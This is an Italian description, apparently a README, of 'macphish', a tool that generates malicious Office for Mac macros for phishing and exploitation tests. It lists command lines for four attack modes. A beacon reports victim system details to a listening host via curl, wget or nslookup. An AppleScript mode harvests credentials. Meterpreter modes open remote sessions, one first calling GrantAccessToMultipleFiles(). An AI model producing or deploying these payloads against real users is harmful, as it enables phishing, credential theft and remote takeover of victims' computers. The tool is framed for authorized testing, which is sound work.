
Genera macro dannose per Office su Mac con payload beacon, credential harvesting e meterpreter per test di phishing e exploitation su macOS.
Generatore di Payload per Macro di Office per Mac

Sono disponibili 4 vettori di attacco:
Per il metodo 'creds', macphish può generare direttamente lo script Applescript, nel caso in cui sia necessario eseguirlo da una shell.
All'esecuzione, questo payload invierà un segnale al nostro host in ascolto e fornirà informazioni di base sul sistema della vittima. Il modo più semplice per generare un payload beacon è:
$./macphish.py -lh <listening host>
Per impostazione predefinita, utilizza curl, ma è possibile usare altre utility (wget, nslookup) modificando il template del comando.
$./macphish.py -lh <listening host> -lp <listening port> -a creds
Il modo più semplice per generare un payload meterpreter è:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
Per generare un payload meterpreter che chiami prima GrantAccessToMultipleFiles():
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
Per gli attacchi meterpreter, al momento sono supportati solo payload python.